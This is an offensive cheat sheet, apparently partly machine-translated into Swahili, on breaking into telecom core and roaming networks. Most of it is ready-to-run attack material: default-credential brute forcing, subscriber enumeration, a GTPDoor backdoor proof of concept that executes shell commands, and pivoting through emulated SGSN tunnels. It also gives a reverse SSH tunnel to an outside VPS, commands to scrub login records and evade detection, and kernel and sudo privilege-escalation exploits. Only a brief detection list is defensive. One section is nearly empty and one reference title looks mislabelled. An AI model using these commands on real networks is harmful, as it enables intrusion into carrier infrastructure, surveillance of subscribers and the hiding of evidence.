Telecom Network Exploitation (GTP / Roaming Environments)

Reading time: 7 minutes

1. Recon & Initial Access

1.1 Default OSS / NE Accounts

Seti kubwa ya ajabu ya vipengele vya mtandao wa wauzaji huja na watumiaji wa SSH/Telnet waliowekwa kwa nguvu kama root:admin, dbadmin:dbadmin, cacti:cacti, ftpuser:ftpuser, … Orodha ya maneno iliyotengwa huongeza kwa kiasi kikubwa mafanikio ya brute-force:

hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt

Ikiwa kifaa kinatoa tu VRF ya usimamizi, pitisha kupitia mwenyeji wa jump kwanza (tazama sehemu «SGSN Emu Tunnel» hapa chini).

1.2 Ugunduzi wa Mwenyeji ndani ya GRX/IPX

Watoa huduma wengi wa GRX bado wanaruhusu ICMP echo kupitia msingi. Changanya masscan na uchunguzi wa gtpv1 UDP uliojengwa ndani ili haraka kuchora wasikilizaji wa GTP-C:

masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55

2. Kuorodhesha Wajibu – cordscan

Zana hii ya Go inatengeneza GTP-C Create PDP Context Request pakiti na kurekodi majibu. Kila jibu linafunua SGSN / MME inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN iliyotembelewa na mteja.

# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap

Key flags:

• --imsi Lengo la mteja IMSI
• --oper Nyumbani / HNI (MCC+MNC)
• -w Andika pakiti za raw kwenye pcap

Misingi muhimu ndani ya binary inaweza kubadilishwa ili kupanua skana:

pingtimeout       = 3   // seconds before giving up
pco               = 0x218080
common_tcp_ports  = "22,23,80,443,8080"

3. Utekelezaji wa Kanuni kupitia GTP – GTPDoor

GTPDoor ni huduma ndogo ya ELF ambayo inafungua UDP 2123 na kuchambua kila pakiti ya GTP-C inayokuja. Wakati mzigo unapoanza na lebo iliyoshirikiwa awali, yaliyobaki yanachambuliwa (AES-128-CBC) na kutekelezwa kupitia /bin/sh -c. Stdout/stderr zinahamishwa ndani ya Echo Response ujumbe ili kwamba hakuna kikao chochote cha nje kinachoundwa.

Pakiti ya PoC ya chini (Python):

import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))

Detection:

• mwenyeji yeyote anayepeleka Maombi ya Echo yasiyo sawa kwa IP za SGSN
• Bendera ya toleo la GTP imewekwa kuwa 1 wakati aina ya ujumbe = 1 (Echo) – mabadiliko kutoka kwa spesifiki

4. Pivoting Through the Core

4.1 sgsnemu + SOCKS5

OsmoGGSN inatoa emulators ya SGSN inayoweza kuanzisha muktadha wa PDP kuelekea GGSN/PGW halisi. Mara baada ya kujadiliwa, Linux inapokea kiunganishi kipya cha tun0 kinachoweza kufikiwa kutoka kwa mwenzi wa roaming.

sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 &   # internal SOCKS proxy

Kwa matumizi sahihi ya firewall hair-pinning, handaki hii inapita VLANs za ishara pekee na inakufikisha moja kwa moja kwenye data plane.

4.2 SSH Reverse Tunnel juu ya Port 53

DNS karibu kila wakati iko wazi katika miundombinu ya kuhamahama. Funua huduma ya ndani ya SSH kwa VPS yako inayosikiliza kwenye :53 na urudi baadaye kutoka nyumbani:

ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com

Check that GatewayPorts yes is enabled on the VPS.

5. Covert Channels

All implants implement watchdogs that timestomp their binaries and re-spawn if crashed.

6. Defense Evasion Cheatsheet

# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history
export HISTFILE=/dev/null

# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup   # hide from top/htop
printf '\0' > /proc/$$/comm    # appears as [kworker/1]

touch -r /usr/bin/time /usr/bin/chargen   # timestomp
setenforce 0                              # disable SELinux

7. Kuinua Haki kwenye NE za Kizamani

# DirtyCow – CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd

# PwnKit – CVE-2021-4034
python3 PwnKit.py

# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py

Usafi wa mazingira:

userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c

8. Tool Box

• cordscan, GTPDoor, EchoBackdoor, NoDepDNS – zana za kawaida zilizoelezwa katika sehemu za awali.
• FScan : skanning ya TCP ya intranet (fscan -p 22,80,443 10.0.0.0/24)
• Responder : LLMNR/NBT-NS rogue WPAD
• Microsocks + ProxyChains : pivoting nyepesi wa SOCKS5
• FRP (≥0.37) : NAT traversal / bridging ya mali

Detection Ideas

1. Kila kifaa kingine isipokuwa SGSN/GGSN kinachounda Maombi ya Kuunda Muktadha wa PDP.
2. Bandari zisizo za kawaida (53, 80, 443) zinapokea mikono ya SSH kutoka kwa IP za ndani.
3. Maombi ya Echo mara kwa mara bila Majibu ya Echo yanayolingana – yanaweza kuashiria beacon za GTPDoor.
4. Kiwango cha juu cha trafiki ya ICMP echo-reply yenye viwanja vikubwa, visivyo na sifuri vya kitambulisho/mfuatano.

References

• Palo Alto Unit42 – Infiltration of Global Telecom Networks
• 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0)
• 3GPP TS 29.281 – GTPv2-C (v17.6.0)